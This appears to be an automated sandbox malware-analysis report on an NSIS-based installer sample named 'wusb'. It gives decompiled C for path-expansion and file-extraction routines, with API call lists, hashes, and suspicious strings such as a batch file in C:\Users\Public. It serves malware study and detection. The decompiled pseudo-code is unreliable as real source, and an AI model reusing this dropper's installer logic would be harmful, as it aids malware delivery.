                                                          • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                                        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\Public,C:\Users\Public,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                        • String ID: "C:\Users\Public\wusb.bat" $C:\Users\Public$C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                        • API String ID: 4283519449-1650205919
                                                        • Opcode ID: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                        • Instruction ID: c18f197c65803053ad6b90da34fb4f59cecbc903e05eff4d530fc012fb388881
                                                        • Opcode Fuzzy Hash: f1834550daec702275e8430a9050beb8303241b1a1e67c97a0945f4f5965c092
                                                        • Instruction Fuzzy Hash: 3E51F271A01205AFDB209F65DD85B9E7EA8EB04319F10407BF904B72D5CB788E818BAD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040626E Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 436 40626e-406279 437 40627b-40628a 436->437 438 40628c-4062a2 436->438 437->438 439 4062a8-4062b5 438->439 440 4064ba-4064c0 438->440 439->440 443 4062bb-4062c2 439->443 441 4064c6-4064d1 440->441 442 4062c7-4062d4 440->442 444 4064d3-4064d7 call 40624c 441->444 445 4064dc-4064dd 441->445 442->441 446 4062da-4062e6 442->446 443->440 444->445 448 4064a7 446->448 449 4062ec-40632a 446->449 450 4064b5-4064b8 448->450 451 4064a9-4064b3 448->451 452 406330-40633b 449->452 453 40644a-40644e 449->453 450->440 451->440 454 406354 452->454 455 40633d-406342 452->455 456 406450-406456 453->456 457 406481-406485 453->457 461 40635b-406362 454->461 455->454 458 406344-406347 455->458 459 406466-406472 call 40624c 456->459 460 406458-406464 call 406193 456->460 462 406494-4064a5 lstrlenW 457->462 463 406487-40648f call 40626e 457->463 458->454 464 406349-40634c 458->464 474 406477-40647d 459->474 460->474 466 406364-406366 461->466 467 406367-406369 461->467 462->440 463->462 464->454 470 40634e-406352 464->470 466->467 472 4063a4-4063a7 467->472 473 40636b-406389 call 40611a 467->473 470->461 477 4063b7-4063ba 472->477 478 4063a9-4063b5 GetSystemDirectoryW 472->478 482 40638e-406392 473->482 474->462 476 40647f 474->476 483 406442-406448 call 4064e0 476->483 480 406425-406427 477->480 481 4063bc-4063ca GetWindowsDirectoryW 477->481 479 406429-40642d 478->479 479->483 488 40642f 479->488 480->479 485 4063cc-4063d6 480->485 481->480 486 406432-406435 482->486 487 406398-40639f call 40626e 482->487 483->462 490 4063f0-406406 SHGetSpecialFolderLocation 485->490 491 4063d8-4063db 485->491 486->483 493 406437-40643d lstrcatW 486->493 487->479 488->486 495 406421 490->495 496 406408-40641f SHGetPathFromIDListW CoTaskMemFree 490->496 491->490 494 4063dd-4063e4 491->494 493->483 498 4063ec-4063ee 494->498 495->480 496->479 496->495 498->479 498->490
                                                        C-Code - Quality: 72%
                                                        			E0040626E(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t43 =  *( *0x4291dc - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x42a258 + _t43 * 2;
				_t44 = 0x4281a0;
				_t110 = 0x4281a0;
				if(_a4 >= 0x4281a0 && _a4 - 0x4281a0 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E0040626E(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x4281a0;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = (_t106 << 0xb) + 0x42b000;
							E0040624C(_t110, (_t106 << 0xb) + 0x42b000);
						} else {
							E00406193(_t110,  *0x42a208);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E004064E0(_t110);
						}
						goto L43;
					}
					_t86 =  *0x42a20c;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x42a2a4;
						if( *0x42a2a4 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x42a204;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x42a208,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x42a208,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E0040611A( *0x42a258, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a258 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E0040626E(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E0040624C(_a4, _t44);
			}






























                                                        0x0040626e
                                                        0x0040626e
                                                        0x0040626e
                                                        0x00406274
                                                        0x00406279
                                                        0x0040628a
                                                        0x0040628a
                                                        0x00406292
                                                        0x00406293
                                                        0x00406294
                                                        0x00406295
                                                        0x00406298
                                                        0x004062a0
                                                        0x004062a2
                                                        0x004062bb
                                                        0x004062be
                                                        0x004062be
                                                        0x004064ba
                                                        0x004064ba
                                                        0x004064c0
                                                        0x00000000
                                                        0x00000000
                                                        0x004062ce
                                                        0x004062d4
                                                        0x00000000
                                                        0x00000000
                                                        0x004062dc
                                                        0x004062dd
                                                        0x004062df
                                                        0x004062e3
                                                        0x004062e6
                                                        0x004064a7
                                                        0x004064b5
                                                        0x004064b8
                                                        0x004064b8
                                                        0x004064a9
                                                        0x004064ac
                                                        0x004064af
                                                        0x004064b1
                                                        0x004064b1
                                                        0x00000000
                                                        0x004064a7
                                                        0x004062ec
                                                        0x004062ef
                                                        0x004062fe
                                                        0x00406305
                                                        0x0040630f
                                                        0x00406313
                                                        0x00406316
                                                        0x00406319
                                                        0x0040631e
                                                        0x00406323
                                                        0x00406327
                                                        0x0040632a
                                                        0x0040644a
                                                        0x0040644e
                                                        0x00406481
                                                        0x00406485
                                                        0x0040648a
                                                        0x0040648f
                                                        0x0040648f
                                                        0x00406494
                                                        0x00406495
                                                        0x0040649a
                                                        0x0040649d
                                                        0x004064a0
                                                        0x00000000
                                                        0x004064a0
                                                        0x00406450
                                                        0x00406453
                                                        0x00406456
                                                        0x0040646b
                                                        0x00406472
                                                        0x00406458
                                                        0x0040645f
                                                        0x0040645f
                                                        0x0040647a
                                                        0x0040647d
                                                        0x00406442
                                                        0x00406443
                                                        0x00406443
                                                        0x00000000
                                                        0x0040647d
                                                        0x00406330
                                                        0x00406338
                                                        0x0040633a
                                                        0x0040633b
                                                        0x00406354
                                                        0x00406354
                                                        0x0040635b
                                                        0x0040635b
                                                        0x00406362
                                                        0x00406366
                                                        0x00406366
                                                        0x00406367
                                                        0x00406369
                                                        0x004063a4
                                                        0x004063a7
                                                        0x004063b7
                                                        0x004063ba
                                                        0x004063c2
                                                        0x004063c8
                                                        0x004063c8
                                                        0x00406425
                                                        0x00406425
                                                        0x00406427
                                                        0x00000000
                                                        0x00000000
                                                        0x004063cc
                                                        0x004063d3
                                                        0x004063d4
                                                        0x004063d6
                                                        0x004063f0
                                                        0x004063fe
                                                        0x00406404
                                                        0x00406406
                                                        0x00406421
                                                        0x00406421
                                                        0x00406421
                                                        0x00000000
                                                        0x00406421
                                                        0x0040640c
                                                        0x00406417
                                                        0x0040641d
                                                        0x0040641f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040641f
                                                        0x004063d8
                                                        0x004063db
                                                        0x00000000
                                                        0x00000000
                                                        0x004063ea
                                                        0x004063ec
                                                        0x004063ee
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004063ee
                                                        0x00000000
                                                        0x00406425
                                                        0x004063af
                                                        0x00000000
                                                        0x0040636b
                                                        0x00406389
                                                        0x0040638e
                                                        0x00406392
                                                        0x00406432
                                                        0x00406432
                                                        0x00406435
                                                        0x0040643d
                                                        0x0040643d
                                                        0x00000000
                                                        0x00406435
                                                        0x0040639a
                                                        0x00406429
                                                        0x00406429
                                                        0x0040642d
                                                        0x00000000
                                                        0x00000000
                                                        0x0040642f
                                                        0x00000000
                                                        0x0040642f
                                                        0x00406369
                                                        0x0040633d
                                                        0x00406342
                                                        0x00000000
                                                        0x00000000
                                                        0x00406344
                                                        0x00406347
                                                        0x00000000
                                                        0x00000000
                                                        0x00406349
                                                        0x0040634c
                                                        0x00000000
                                                        0x0040634e
                                                        0x0040634e
                                                        0x00000000
                                                        0x0040634e
                                                        0x0040634c
                                                        0x004064c6
                                                        0x004064d1
                                                        0x004064dd
                                                        0x004064dd
                                                        0x00000000

                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000400), ref: 004063AF
                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000400,00000000,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?,004052E7,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000), ref: 004063C2
                                                        • SHGetSpecialFolderLocation.SHELL32(004052E7,00410EA0,00000000,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?,004052E7,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000), ref: 004063FE
                                                        • SHGetPathFromIDListW.SHELL32(00410EA0,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 0040640C
                                                        • CoTaskMemFree.OLE32(00410EA0), ref: 00406417
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,\Microsoft\Internet Explorer\Quick Launch), ref: 0040643D
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?,004052E7,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000), ref: 00406495
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade$Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 717251189-3567956709
                                                        • Opcode ID: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                        • Instruction ID: 1d846ac168704965e63d6b1540e117b92082746421250facdf4000baa2e8fd31
                                                        • Opcode Fuzzy Hash: 5ac7d34cae972a88d7e271cc5c0f960f95d4283ece9e7c17a9ddda12c5cbf51a
                                                        • Instruction Fuzzy Hash: 8F610E71A00105ABDF249F64CC40AAE37A9EF50314F62813FE943BA2D0D77D49A2C79E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        C-Code - Quality: 61%
                                                        			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C37(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
				_t35 = E00405B94( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"Ancone";
				if(_t35 == 0) {
					lstrcatW(E00405B1D(E0040624C(_t84, L"C:\\Users\\alfons\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth")), ??);
				} else {
					E0040624C();
				}
				E004064E0(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040658F(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405D19(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405D3E(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004052B0(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2a8;
						goto L32;
					} else {
						E0040624C("Finishs", _t81);
						E0040624C(_t81, _t84);
						E0040626E(_t77, _t81, _t84, "C:\Users\alfons\AppData\Roaming",  *((intOrPtr*)(_t86 - 0x14)));
						E0040624C(_t81, "Finishs");
						_t64 = E004058AE("C:\Users\alfons\AppData\Roaming",  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2a8 =  &( *0x42a2a8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E004052B0();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004052B0(0xffffffea,  *(_t86 - 8)); // executed
				 *0x42a2d4 =  *0x42a2d4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x30));
				_push( *((intOrPtr*)(_t86 - 0x20)));
				_t45 = E004030FA(); // executed
				 *0x42a2d4 =  *0x42a2d4 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E0040626E(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E0040626E(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E004058AE();
					goto L29;
				}
				goto L33;
			}


















                                                        0x0040176f
                                                        0x00401776
                                                        0x00401782
                                                        0x00401785
                                                        0x0040178a
                                                        0x0040178d
                                                        0x00401794
                                                        0x004017b0
                                                        0x00401796
                                                        0x00401797
                                                        0x00401797
                                                        0x004017b6
                                                        0x004017bb
                                                        0x004017bb
                                                        0x004017bf
                                                        0x004017c2
                                                        0x004017c7
                                                        0x004017c9
                                                        0x004017cb
                                                        0x004017d0
                                                        0x004017d0
                                                        0x004017db
                                                        0x004017db
                                                        0x004017ec
                                                        0x004017ee
                                                        0x004017ee
                                                        0x004017ef
                                                        0x004017ef
                                                        0x004017f2
                                                        0x004017f5
                                                        0x004017f8
                                                        0x004017f8
                                                        0x004017ff
                                                        0x0040180e
                                                        0x00401813
                                                        0x00401816
                                                        0x00401819
                                                        0x00000000
                                                        0x00000000
                                                        0x0040181b
                                                        0x0040181e
                                                        0x00401874
                                                        0x00401879
                                                        0x004015b6
                                                        0x00402885
                                                        0x00402885
                                                        0x00402abf
                                                        0x00402ac2
                                                        0x00402ac2
                                                        0x00000000
                                                        0x00401820
                                                        0x00401826
                                                        0x0040182d
                                                        0x0040183a
                                                        0x00401845
                                                        0x0040185b
                                                        0x0040185b
                                                        0x0040185e
                                                        0x00000000
                                                        0x00401864
                                                        0x00401864
                                                        0x00401865
                                                        0x00401882
                                                        0x00402ac8
                                                        0x00402ac8
                                                        0x00402ac8
                                                        0x00401867
                                                        0x00401867
                                                        0x00401868
                                                        0x00401493
                                                        0x004022f1
                                                        0x004022f1
                                                        0x004022f1
                                                        0x00401865
                                                        0x0040185e
                                                        0x00402aca
                                                        0x00402ace
                                                        0x00402ace
                                                        0x00401892
                                                        0x00401897
                                                        0x0040189d
                                                        0x0040189e
                                                        0x0040189f
                                                        0x004018a2
                                                        0x004018a5
                                                        0x004018aa
                                                        0x004018b0
                                                        0x004018b4
                                                        0x004018b6
                                                        0x004018be
                                                        0x004018ca
                                                        0x004018b8
                                                        0x004018b8
                                                        0x004018bc
                                                        0x00000000
                                                        0x00000000
                                                        0x004018bc
                                                        0x004018d3
                                                        0x004018d9
                                                        0x004018db
                                                        0x00000000
                                                        0x004018e1
                                                        0x004018e1
                                                        0x004018e4
                                                        0x004018fc
                                                        0x004018e6
                                                        0x004018e9
                                                        0x004018f2
                                                        0x004018f2
                                                        0x00401901
                                                        0x00401906
                                                        0x004022ec
                                                        0x00000000
                                                        0x004022ec
                                                        0x00000000

                                                        APIs
                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                        • CompareFileTime.KERNEL32(-00000014,?,Ancone,Ancone,00000000,00000000,Ancone,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth,?,?,00000031), ref: 004017D5
                                                          • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                          • Part of subcall function 004052B0: lstrlenW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                          • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                          • Part of subcall function 004052B0: lstrcatW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00403233), ref: 0040530B
                                                          • Part of subcall function 004052B0: SetWindowTextW.USER32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 0040531D
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: Ancone$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Roaming$Finishs
                                                        • API String ID: 1941528284-3644554970
                                                        • Opcode ID: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                                        • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
                                                        • Opcode Fuzzy Hash: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                                        • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

